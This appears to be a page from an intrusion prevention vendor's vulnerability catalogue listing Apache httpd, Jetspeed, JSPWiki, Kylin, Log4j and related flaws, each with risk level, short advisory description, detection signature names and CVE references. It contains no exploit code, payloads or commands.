Moderate

First detected in:

sgpkg-ips-442-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache

Type:

Malfunction

Description:

An information disclosure vulnerability has been identified in Apache httpd. The vulnerability is due to an error while creating the default HTTP 400 error page. If a custom handler for the HTTP 400 error code is not specified, the default handler could expose httpOnly cookies to the attacker. A remote, unauthenticated attacker can exploit this vulnerability by causing the target user's browser to send specific HTTP requests to the vulnerable server. A successful attack will result in disclosure of potentially sensitive information in httpOnly cookies.

Situation:

HTTP_CSH-Apache-Httpd-Error-Code-400-Httponly-Cookie-Handling-Information-Disclosure
HTTP_CSH-Very-Long-Cookie-Header

References:

CVE-2012-0053
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0053

BID-51706
http://www.securityfocus.com/bid/51706

OSVDB-78556
http://www.osvdb.org/78556

Apache-Httpd-Filesmatch-Directive-Security-Restriction-Bypass

About this vulnerability:

A vulnerability in Apache Software Foundation httpd

Risk:

Moderate

First detected in:

sgpkg-ips-1064-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache

Type:

Malfunction

Description:

Improper handling of a regular expression match of the URL file name causes a security restriction bypass vulnerability in the Apache HTTP server. A successful exploit allows an attacker to upload arbitrary files to the target system.

Situation:

HTTP_CSU-Apache-Httpd-Filesmatch-Directive-Security-Restriction-Bypass

References:

CVE-2017-15715
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15715

BID-103525
http://www.securityfocus.com/bid/103525

Apache-Httpd-HTTP2-Cache-Digest-Header-Parsing-Memory-Corruption

About this vulnerability:

A vulnerability in Apache httpd

Risk:

Moderate

First detected in:

sgpkg-ips-1283-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache

Type:

Malfunction

Description:

There has been reported a memory corruption vulnerability in Apache httpd application. Successful exploitation could lead in arbitrary code execution.

Situation:

HTTP_CRH-Apache-Httpd-HTTP2-Cache-Digest-Header-Parsing-Memory-Corruption

References:

CVE-2020-9490
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9490

Apache-Httpd-Mod_Auth_Digest-Memory-Access-Denial-Of-Service

About this vulnerability:

A vulnerability in Apache Software Foundation httpd

Risk:

Moderate

First detected in:

sgpkg-ips-1008-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache

Type:

Malfunction

Description:

Improper processing of authorization headers in HTTP requests causes a memory access error in Apache httpd. A successful exploit allows an attacker to cause a denial of service condition on the target system or disclose information thereon.

Situation:

HTTP_CSH-Apache-Httpd-Mod_Auth_Digest-Memory-Access-Denial-Of-Service

References:

CVE-2017-9788
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9788

Apache-Httpd-Mod_Cache_socache-Denial-Of-Service

About this vulnerability:

A vulnerability in Apache Software Foundation httpd

Risk:

High

First detected in:

sgpkg-ips-1130-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Software Foundation httpd

Type:

Integer Overflow

Description:

A denial-of-service vulnerability has been reported in Apache httpd. The vulnerability is due to improper validation of the headers in HTTP requests. A remote attacker can exploit this vulnerability by sending specially crafted HTTP requests to the target system. Successful exploitation can lead to service crash and denial-of-service conditions on the target system.

Situation:

HTTP_CSH-Request-With-Multiple-Header-Lines-With-Empty-Content

References:

CVE-2018-1303
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1303

BID-103522
http://www.securityfocus.com/bid/103522

Apache-Httpd-Mod_Cgi-Handler-Confusion

About this vulnerability:

A vulnerability in Apache Software Foundation HTTP Server

Risk:

Moderate

First detected in:

sgpkg-ips-1786-5242

Last changed:

sgpkg-ips-1788-5242

Platform:

Generic

Software:

Apache2

Type:

Malfunction

Description:

Improper processing of request data causes a handler confusion vulnerability in mod_cgi of the Apache web server. A successful exploitation allows an attacker to inject headers and possibly execute code on the target system.

Situation:

HTTP_CRL-Apache-Httpd-Mod_Cgi-Handler-Confusion

References:

CVE-2024-38476
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38476

Apache-Httpd-Mod_HTTP2-H2_Session_process-Denial-Of-Service

About this vulnerability:

A vulnerability in Apache HTTP Server

Risk:

High

First detected in:

sgpkg-ips-1681-5242

Last changed:

sgpkg-ips-1681-5242

Platform:

Generic

Software:

Apache

Type:

Resource Starvation

Description:

A denial of service vulnerability has been reported in the Apache httpd module mod_http2. The vulnerability is due to improper validation of HTTP/2 requests with an initial window size of zero. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in denial of service conditions on the target server.

Situation:

HTTP2_SETTINGS-Apache-Httpd-Mod_HTTP2-H2_Session_process-Denial-Of-Service
HTTP_CSH-Apache-Httpd-Mod_HTTP2-H2_Session_process-Denial-Of-Service

References:

CVE-2023-43622
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-43622

Apache-Httpd-Mod_HTTP2-Null-Pointer-Dereference

About this vulnerability:

A vulnerability in Apache Software Foundation HTTP Server

Risk:

Moderate

First detected in:

sgpkg-ips-1019-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache

Type:

Malfunction

Description:

Improper handling of HTTP protocol headers related to protocol upgrade causes a null pointer dereference in the Apache HTTP server. A successful exploit allows an attacker to cause a denial of service condition on the target system.

Situation:

HTTP_CS-Apache-Httpd-Mod_HTTP2-Null-Pointer-Dereference

References:

CVE-2017-7659
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7659

Apache-Httpd-Mod_Log_Config-Cookie-Handling-Denial-Of-Service

About this vulnerability:

A vulnerability in Apache Software Foundation HTTP Server

Risk:

Moderate

First detected in:

sgpkg-ips-440-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache

Type:

Malfunction

Description:

A denial of service vulnerability has been identified in Apache httpd. The vulnerability is due to an error while logging crafted HTTP requests by mod_log_config. If the '%{cookiename}C' log format is in use, certain cookies can cause the server to crash. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable server. A successful attack will crash the server resulting in a denial-of-service condition.

Situation:

HTTP_CSH-Apache-Httpd-Mod_Log_Config-Cookie-Handling-Denial-Of-Service

References:

CVE-2012-0021
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0021

BID-51705
http://www.securityfocus.com/bid/51705

OSVDB-78555
http://www.osvdb.org/78555

Apache-Httpd-Mod_Lua-req_parsebody-Denial-Of-Service

About this vulnerability:

A vulnerability in Apache httpd.

Risk:

High

First detected in:

sgpkg-ips-1469-5242

Last changed:

sgpkg-ips-1469-5242

Platform:

Generic

Software:

Apache

Type:

Malfunction

Description:

A vulnerability in Apache httpd, versions prior to 2.4.53, which allows remote attackers to cause a denial of service condition by sending a crafted request to the target server, due to use of uninitialized memory when processing a request.

Situation:

HTTP_CS-Apache-Httpd-Mod_Lua-req_parsebody-Denial-Of-Service

References:

CVE-2022-22719
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22719

Apache-Httpd-Mod_Lua-req_parsebody-Integer-Underflow

About this vulnerability:

A vulnerability in Apache Software Foundation httpd.

Risk:

High

First detected in:

sgpkg-ips-1425-5242

Last changed:

sgpkg-ips-1425-5242

Platform:

Generic

Software:

Apache Software Foundation httpd

Type:

Integer Overflow

Description:

A vulnerability in Apache Software Foundation httpd, versions before 2.4.52, which allows remote attackers to execute arbitrary code by sending a crafted request to the target server, due to the improper validation of the request body in the module's multipart parser, called via the r:parsebody() function in Lua scripts.

Situation:

HTTP_CS-Apache-Httpd-Mod_Lua-req_parsebody-Integer-Underflow

References:

CVE-2021-44790
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44790

Apache-Httpd-Mod_Md-Null-Pointer-Dereference

About this vulnerability:

A vulnerability in Apache Software Foundation httpd

Risk:

Moderate

First detected in:

sgpkg-ips-1096-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache

Type:

Input Validation

Description:

Insufficient input validation in the md_require_https_maybe() and md_http_challenge_pr() functions causes a null pointer dereference vulnerability in the Apache HTTP server. A successful exploit can cause a denial of service condition.

Situation:

HTTP_CSU-Apache-Httpd-Mod_Md-Null-Pointer-Dereference

References:

CVE-2018-8011
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8011

Apache-Httpd-Mod_Proxy-Ap_Proxy_Get_Worker_ex-Null-Pointer-Dereference

About this vulnerability:

A vulnerability in Apache Software Foundation httpd

Risk:

Moderate

First detected in:

sgpkg-ips-1428-5242

Last changed:

sgpkg-ips-1428-5242

Platform:

Generic

Software:

Apache Software Foundation httpd

Type:

Malfunction

Description:

Improper handling of malformed Request-URIs sent to the server when configured as a forward proxy causes a null pointer dereference vulnerability in Apache Httpd. A successful exploit can cause a denial of service condition or access to a domain socket endpoint.

Situation:

HTTP_CSU-Apache-Httpd-Mod_Proxy-Ap_Proxy_Get_Worker_ex-Null-Pointer-Dereference

References:

CVE-2021-44224
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44224

Apache-Httpd-Mod_Proxy-Security-Bypass

About this vulnerability:

A vulnerability in Apache Software Foundation HTTP Server

Risk:

Moderate

First detected in:

sgpkg-ips-427-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache mod_proxy; IBM HTTP Server for OS/400

Type:

Malfunction

Description:

A security bypass vulnerability has been identified in the Apache HTTP Server's reverse proxy module mod_proxy. The vulnerability is due to an input validation error when mod_proxy handles a URI under certain RewriteRule or ProxyPassMatch directives in the configuration. A remote attacker can exploit this vulnerabilities by sending a malicious request to the target server. A successful attack can lead to exposure of internal servers and their resources to outside users.

Situation:

HTTP_CS-Apache-Httpd-Mod_Proxy-Security-Bypass
HTTP_CSU-Apache-Httpd-Mod_Proxy-Security-Bypass
HTTP_CSU-Apache-Httpd-Mod_Proxy-Security-Bypass-2

References:

CVE-2011-3368
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3368

BID-49957
http://www.securityfocus.com/bid/49957

OSVDB-76079
http://www.osvdb.org/76079

Apache-Httpd-Mod_Proxy-Unix-Socket-Path-Handling-Server-Side-Request-Forgery

About this vulnerability:

A vulnerability in Apache Software Foundation httpd

Risk:

Moderate

First detected in:

sgpkg-ips-1399-5242

Last changed:

sgpkg-ips-1399-5242

Platform:

Generic

Software:

Apache Software Foundation httpd

Type:

Malfunction

Description:

Missing validation of the unix socket path in an HTTP request causes a server-side request forgery vulnerability in Apache HTTPd. A successful exploit can allow an attacker to access data on the target system or spoof content.

Situation:

HTTP_CRL-Apache-Httpd-Mod_Proxy-Unix-Socket-Path-Handling-Server-Side-Request-Forgery

References:

CVE-2021-40438
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40438

Apache-Httpd-Mod_Proxy_ajp-Denial-Of-Service

About this vulnerability:

A vulnerability in Apache Software Foundation HTTP Server

Risk:

High

First detected in:

sgpkg-ips-593-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache

Type:

Input Validation

Description:

A denial of service vulnerability has been identified in Apache httpd. The vulnerability is due to an error while processing crafted HTTP requests by mod_proxy_ajp when used with mod_proxy_balancer. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted HTTP requests to the vulnerable server. A successful attack will put the server into an error state until the retry timeout is expired, resulting in a temporary denial-of-service.

Situation:

HTTP_CS-Apache-Httpd-Mod_Proxy_ajp-Denial-Of-Service

References:

CVE-2011-3348
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3348

BID-49616
http://www.securityfocus.com/bid/49616

OSVDB-75647
http://www.osvdb.org/75647

Apache-Httpd-Mod_Proxy_balancer-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Apache Software Foundation HTTP Server

Risk:

High

First detected in:

sgpkg-ips-514-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache

Type:

Input Validation

Description:

A cross site scripting vulnerability exists in Apache HTTP web server mod_proxy_balancer. The vulnerability is due to a lack of input validation in the URI of the mod_proxy_balancer manager interface. A remote attacker can exploit these vulnerabilities by enticing a user to follow a specially crafted web link. Successful exploitation could result in attacker controlled script code executing in the browser of the affected user.

Situation:

HTTP_CSU-Apache-Httpd-Mod_Proxy_balancer-Cross-Site-Scripting

References:

CVE-2012-4558
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4558

BID-58165
http://www.securityfocus.com/bid/58165

Apache-Httpd-Mod_remoteip-Buffer-Overflow

About this vulnerability:

A vulnerability in Apache Software Foundation httpd

Risk:

Moderate

First detected in:

sgpkg-ips-1188-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache

Type:

Buffer Overflow

Description:

There has been reported a buffer overflow in mod_remoteip component of Apache httpd. Successful attack can lead in remote code execution..

Situation:

HTTP_CS-Apache-Httpd-Mod_remoteip-Buffer-Overflow

References:

CVE-2019-10097
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10097

Apache-Httpd-Mod_sed-CVE-2022-30522-Denial-of-Service

About this vulnerability:

A vulnerability in Apache httpd.

Risk:

High

First detected in:

sgpkg-ips-1487-5242

Last changed:

sgpkg-ips-1487-5242

Platform:

Generic

Software:

Apache Software Foundation httpd

Type:

Input Validation

Description:

A vulnerability in Apache httpd, versions prior to 2.4.54, which allows remote attackers to create a denial of service condition by sending crafted requests, do to improper input validation for the mod_sed module.

Situation:

HTTP_CS-Apache-Httpd-Mod_sed-CVE-2022-30522-Denial-of-Service

References:

CVE-2022-30522
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30522

Apache-Httpd-Mod_sed-Integer-Overflow

About this vulnerability:

A vulnerability in Apache Software Foundation httpd.

Risk:

High

First detected in:

sgpkg-ips-1481-5242

Last changed:

sgpkg-ips-1481-5242

Platform:

Generic

Software:

Apache Software Foundation httpd

Type:

Integer Overflow

Description:

A vulnerability in Apache Software Foundation httpd, versions prior to 2.4.53, which allows remote attackers to execute arbitrary code by sending a crafted request to the target server, due to mixing signed and unsigned values when processing mod_sed requests.

Situation:

HTTP_CSH-Apache-Httpd-Mod_sed-Integer-Overflow

References:

CVE-2022-23943
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23943

Apache-Httpd-Mod_SSL-TLS-Renegotiation-Denial-Of-Service

About this vulnerability:

A vulnerability in Apache Software Foundation httpd

Risk:

High

First detected in:

sgpkg-ips-1137-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Software Foundation httpd

Type:

Infinite Loop

Description:

A denial-of-service vulnerability has been reported in Apache httpd. The vulnerability is due to improper handling of client-initiated renegotiation when using OpenSSL version 1.1.1. A remote attacker could exploit this vulnerability by sending crafted request including performing a TLS renegotiation to the target server. Successful exploitation could result in httpd entering infinite loop and denial of service condition.

Situation:

HTTPS_SS-Apache-Httpd-Mod_SSL-TLS-Renegotiation-Denial-Of-Service

References:

CVE-2019-0190
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0190

Apache-Httpd-Multiple-Mime-Headers-DoS

About this vulnerability:

Denial of Service vulnerability in Apache HTTP server

Risk:

Low

First detected in:

sgpkg-ips-14-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache

Type:

Malfunction

Description:

Apache HTTP Server versions 1.3.1 and earlier are vulnerable to a Denial of Service (DoS) attack. A remote attacker can send multiple copies of MIME headers to the server to consume 100% of the CPU resources. Also known as the "sioux" vulnerability.

Situation:

HTTP_CSH-Apache-Httpd-Multiple-Mime-Headers-DoS-2

References:

CVE-1999-1199
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1199

OSVDB-9707
http://www.osvdb.org/9707

Apache-Httpd-Range-Header-Field-Memory-Exhaustion

About this vulnerability:

A vulnerability in Apache Software Foundation HTTP Server

Risk:

High

First detected in:

sgpkg-ips-409-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache

Type:

Resource Starvation

Description:

A memory exhaustion vulnerability has been identified in Apache httpd. The vulnerability is due to an error while parsing the Range header field. A malformed Ranges field causes the program to consume excessive resources. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted request to the vulnerable server. A successful attack will cause a denial-of-service condition by causing the server to become unresponsive.

Situation:

Analyzer_Apache-httpd-Range-Header-Field-Memory-Exhaustion
HTTP_CSH-Apache-Httpd-Range-Header-Field-Memory-Exhaustion

References:

CVE-2011-3192
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192

BID-49303
http://www.securityfocus.com/bid/49303

OSVDB-74721
http://www.osvdb.org/74721

Apache-Hugegraph-Gremlin-Code-Injection-CVE-2024-27348

About this vulnerability:

A vulnerability in Apache HugeGraph

Risk:

High

First detected in:

sgpkg-ips-1757-5242

Last changed:

sgpkg-ips-1757-5242

Platform:

Generic

Software:

Apache HugeGraph

Type:

Input Validation

Description:

A code injection vulnerability has been reported for Apache HugeGraph. The vulnerability is due to insufficient input validation of Gremlin scripts, leading to sandbox escape. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in arbitrary code execution in the context of the application.

Situation:

HTTP_CRL-Apache-Hugegraph-CVE-2024-27348-Suspicious-String-In-Gremlin-Query
HTTP_CRL-Apache-Hugegraph-Gremlin-Code-Injection-CVE-2024-27348

References:

CVE-2024-27348
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27348

Apache-ISAPI-Module-Dangling-Pointer

About this vulnerability:

A vulnerability in Apache web server

Risk:

High

First detected in:

sgpkg-ips-291-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Apache

Type:

Malfunction

Description:

There is a vulnerability in the Windows version of Apache web server. A specially crafted request referring to services of a previously unloaded ISAPI module may lead to arbitrary code execution in the security context of the web server.

Situation:

HTTP_CS-Apache-ISAPI-Module-Dangling-Pointer-2
HTTP_CSH-Apache-ISAPI-Module-Dangling-Pointer
HTTP_CS-Apache-ISAPI-Module-Dangling-Pointer

References:

CVE-2010-0425
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0425

BID-38494
http://www.securityfocus.com/bid/38494

Apache-James-Server-Insecure-User-Creation

About this vulnerability:

A vulnerability in Apache James Server

Risk:

High

First detected in:

sgpkg-ips-1226-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

Apache James Server

Type:

Input Validation

Description:

There exists a vulnerability in Apache James Server, version 2.3.2, which allows remote attackers to create users and upload arbitrary files.

Situation:

Generic_CS-Apache-James-Server-Insecure-User-Creation

References:

CVE-2015-7611
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7611

Apache-Jetspeed-Pagemanagementservice-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Apache Software Foundation Jetspeed

Risk:

High

First detected in:

sgpkg-ips-751-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Jetspeed

Type:

Input Validation

Description:

There exists a cross-site scripting vulnerability in Apache Jetspeed 2. A remote, unauthenticated attacker can use this to execute arbitrary code in the user's browser.

Situation:

HTTP_CRL-Apache-Jetspeed-Pagemanagementservice-Cross-Site-Scripting

References:

CVE-2016-0711
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0711

Apache-Jetspeed-Portal-Site-Manager-Zip-File-Upload-Directory-Traversal

About this vulnerability:

A vulnerability in Apache Software Foundation Jetspeed

Risk:

Moderate

First detected in:

sgpkg-ips-747-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Jetspeed

Type:

Directory Traversal

Description:

There exists a directory traversal vulnerability in Apache Jetspeed Portal Site Manager. A remote, authenticated attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Zip_Apache-Jetspeed-Portal-Site-Manager-Zip-File-Upload-Directory-Traversal

References:

CVE-2016-0709
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0709

Apache-Jetspeed-Portal-URI-Path-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Apache Software Foundation Jetspeed

Risk:

Moderate

First detected in:

sgpkg-ips-750-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Jetspeed

Type:

Input Validation

Description:

A cross-site scripting vulnerability has been reported in Apache Jetspeed 2. The vulnerability is due to insufficient validation of the "/portal" URI path. A remote, unauthenticated attacker could exploit this vulnerability by enticing a victim user to visit a crafted web site. Successful exploitation allows the attacker to execute arbitrary scripts in the user's browser.

Situation:

HTTP_CSU-Apache-Jetspeed-Portal-URI-Path-Cross-Site-Scripting

References:

CVE-2016-0712
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0712

Apache-Jetspeed-Rest-API-Unauthorized-User-Modification

About this vulnerability:

Apache Jetspeed Rest API Unauthorized User Modification vulnerability

Risk:

High

First detected in:

sgpkg-ips-903-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Jetspeed

Type:

Insecure Configuration

Description:

The Apache Jetspeed User Manager service, versions before 2.3.1, allows remote attackers to add, edit, or delete users via the REST API due to improper access restriction.

Situation:

HTTP_CSU-Apache-Jetspeed-Rest-API-Unauthorized-User-Modification

References:

CVE-2016-2171
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2171

Apache-Jetspeed-SQL-Injection

About this vulnerability:

An Apache Jetspeed SQL Injection vulnerability.

Risk:

High

First detected in:

sgpkg-ips-768-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Jetspeed

Type:

SQL Injection

Description:

A vulnerability in Apache Jetspeed, versions before 2.3.1, which allows remote attackers to execute arbitrary SQL commands via the role or user parameter in services/usermanager/users/.

Situation:

HTTP_CRL-Apache-Jetspeed-SQL-Injection

References:

CVE-2016-0710
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0710

Apache-Jspwiki-Ajaxpreview-Reflected-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Apache Software Foundation JSPWiki

Risk:

Moderate

First detected in:

sgpkg-ips-1506-5242

Last changed:

sgpkg-ips-1506-5242

Platform:

Generic

Software:

Apache Software Foundation JSPWiki

Type:

Input Validation

Description:

Improper input validation in the AJAXPreview.jsp endpoint causes a cross-site scripting vulnerability in Apache JSPwiki. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-Apache-Jspwiki-Ajaxpreview-Reflected-Cross-Site-Scripting

References:

CVE-2022-28730
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28730

Apache-Jspwiki-Upload-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Apache Software Foundation JSPWiki

Risk:

Moderate

First detected in:

sgpkg-ips-1752-5242

Last changed:

sgpkg-ips-1752-5242

Platform:

Generic

Software:

Apache Software Foundation JSPWiki

Type:

Input Validation

Description:

Improper input validation in the Upload page causes a cross-site scripting vulnerability in Apache JSPWiki. A successful exploitation allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CS-Apache-Jspwiki-Upload-Stored-Cross-Site-Scripting

References:

CVE-2024-27136
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27136

Apache-Jspwiki-Userpreferences-Cross-Site-Request-Forgery

About this vulnerability:

A vulnerability in Apache Software Foundation JSPWiki

Risk:

Moderate

First detected in:

sgpkg-ips-1518-5242

Last changed:

sgpkg-ips-1865-5242

Platform:

Generic

Software:

Apache Software Foundation JSPWiki

Type:

Malfunction

Description:

Apache JSPWiki has a design flaw that allows user profile changes without a password or CSRF token. A successful exploit allows an attacker to access data by sending password change requests to a changes user email address.

Situation:

HTTP_CSU-Apache-Jspwiki-Userpreferences-Cross-Site-Request-Forgery
File-Text_Apache-Jspwiki-Userpreferences-Cross-Site-Request-Forgery

References:

CVE-2022-28731
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28731

Apache-Jspwiki-Weblogplugin-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Apache Software Foundation JSPWiki

Risk:

High

First detected in:

sgpkg-ips-1514-5242

Last changed:

sgpkg-ips-1514-5242

Platform:

Generic

Software:

Apache Software Foundation JSPWiki

Type:

Input Validation

Description:

A stored cross-site scripting vulnerability has been reported for Apache JSPWiki. This vulnerability is due to improper input validation for the WeblogPlugin. A remote, unauthenticated attacker can exploit this vulnerability by by sending a crafted request to the target server. Successful exploitation could result in arbitrary script execution in the security context of the target user's browser.

Situation:

HTTP_CRL-Apache-Jspwiki-Weblogplugin-Stored-Cross-Site-Scripting

References:

CVE-2022-28732
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28732

Apache-Jspwiki-Xhrhtml2markup-Reflected-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Apache Software Foundation JSPWiki

Risk:

Moderate

First detected in:

sgpkg-ips-1504-5242

Last changed:

sgpkg-ips-1504-5242

Platform:

Generic

Software:

Apache Software Foundation JSPWiki

Type:

Input Validation

Description:

Improper input validation on the input to the XHRHtml2Markup.jsp endpoint causes a cross-site scripting vulnerability in Apache JSPWiki. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-Apache-Jspwiki-Xhrhtml2markup-Reflected-Cross-Site-Scripting

References:

CVE-2022-27166
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27166

Apache-Kylin-Getsparksubmitcmd-Command-Injection

About this vulnerability:

A vulnerability in Apache Software Foundation Kylin

Risk:

Moderate

First detected in:

sgpkg-ips-1560-5242

Last changed:

sgpkg-ips-1560-5242

Platform:

Generic

Software:

Apache Kylin

Type:

Malfunction

Description:

A command injection vulnerability has been reported in Apache Kylin. The vulnerability is due to the cube configuration item "kylin.engine.spark-cmd" allowing attackers to set and execute arbitrary commands when building cubes. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary command execution under the security context of the user running the application.

Situation:

File-Text_Apache-Kylin-Getsparksubmitcmd-Command-Injection

References:

CVE-2022-43396
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43396

Apache-Kylin-Rest-API-Admin-Configuration-Information-Disclosure

About this vulnerability:

A vulnerability in Apache Software Foundation Kylin

Risk:

Moderate

First detected in:

sgpkg-ips-1440-5242

Last changed:

sgpkg-ips-1440-5242

Platform:

Generic

Software:

Apache Kylin

Type:

Malfunction

Description:

Improper access control for a specific REST API causes an information disclosure vulnerability in Apache Kylin. A successful exploit allows an attacker to access information on the target system.

Situation:

HTTP_CS-Apache-Kylin-Rest-API-Admin-Configuration-Information-Disclosure

References:

CVE-2020-13937
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13937

Apache-Kylin-Rest-API-Diagnosisservice-Command-Injection

About this vulnerability:

A vulnerability in Apache Kylin

Risk:

Moderate

First detected in:

sgpkg-ips-1267-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Kylin

Type:

Input Validation

Description:

Improper validation of request parameters causes a command injection vulnerability in Apache Kylin. A successful exploit may allow an attacker to execute arbitrary commands on the target system with the privileges of the affected process.

Situation:

HTTP_CSU-Apache-Kylin-Rest-API-Diagnosisservice-Command-Injection

References:

CVE-2020-13925
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13925

Apache-Kylin-Rest-API-Migratecube-Command-Injection

About this vulnerability:

A vulnerability in Apache Software Foundation Kylin

Risk:

High

First detected in:

sgpkg-ips-1258-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Kylin

Type:

Input Validation

Description:

A command injection vulnerability has been reported in Apache Kylin project. The vulnerability is due to insufficient validation of the user-supplied input to migrate REST API endpoint. A remote unauthenticated attacker could exploit this vulnerability by sending malicious requests to vulnerable REST APIs in Apache Kylin. A successful attack may result in arbitrary command execution in the context of the server process.

Situation:

HTTP_CRL-Apache-Kylin-Rest-API-Migratecube-Command-Injection
File-Text_Apache-Kylin-Rest-API-Migratecube-Command-Injection

References:

CVE-2020-1956
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1956

Apache-Kylin-Runsparksubmit-Command-Injection

About this vulnerability:

A vulnerability in Apache Kylin

Risk:

Moderate

First detected in:

sgpkg-ips-1529-5242

Last changed:

sgpkg-ips-1529-5242

Platform:

Generic

Software:

Apache Kylin

Type:

Input Validation

Description:

Improper input validation when overwriting system parameters in cube configurations submitted to the server causes a command injection vulnerability in Apache Kylin. A successful exploit allows an attacker to execute arbitrary commands on the target system.

Situation:

HTTP_CRL-Apache-Kylin-Runsparksubmit-Command-Injection

References:

CVE-2022-24697
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24697

Apache-Log4j-JDBC-Appender-JNDI-Injection

About this vulnerability:

A vulnerability in Apache Software Foundation Log4j

Risk:

High

First detected in:

sgpkg-ips-1426-5242

Last changed:

sgpkg-ips-1426-5242

Platform:

Generic

Software:

Apache Software Foundation Log4j

Type:

Malfunction

Description:

A JNDI Injection vulnerability has been reported in Apache Log4j. This vulnerability is due to improper restriction of JNDI data source names provided via the JDBC Appender configuration. A remote attacker who can control the contents of the Log4j configuration file can exploit this vulnerability by adding a malicious JDBC Appender to the configuration file. Successful exploitation results in the target server making a JNDI lookup request to an attacker-controlled server, which may lead to the execution of arbitrary code under the security context of the affected server.

Situation:

File-Text_Apache-Log4j-JDBC-Appender-JNDI-Injection
File-TextId_Apache-Log4j-JDBC-Appender-JNDI-Injection

References:

CVE-2021-44832
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832

